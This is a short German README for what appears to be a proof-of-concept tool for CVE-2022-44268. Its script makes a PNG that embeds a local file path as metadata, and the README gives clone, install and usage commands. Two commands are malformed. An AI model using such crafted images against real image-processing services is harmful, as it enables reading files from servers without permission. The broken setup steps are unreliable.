
Dieses Python-Skript erzeugt ein PNG-Bild, das mit einer bestimmten Farbe gefüllt ist, und bettet einen Dateipfad als Metadaten mithilfe der Pillow-Bibliothek ein.
pip install pillow)git clone https://github.com/NataliSemi/-CVE-2022-44268.git
cd -CVE-2022-44268.git
pip install pillow
pip install pypng
python create_image.py
Erzeugtes Bild: Nach dem Ausführen des Skripts wird im Repository-Verzeichnis eine Bilddatei mit dem Namen image.png erzeugt.
python create_image.py -f /path/to/local/file.txt -o output_image.png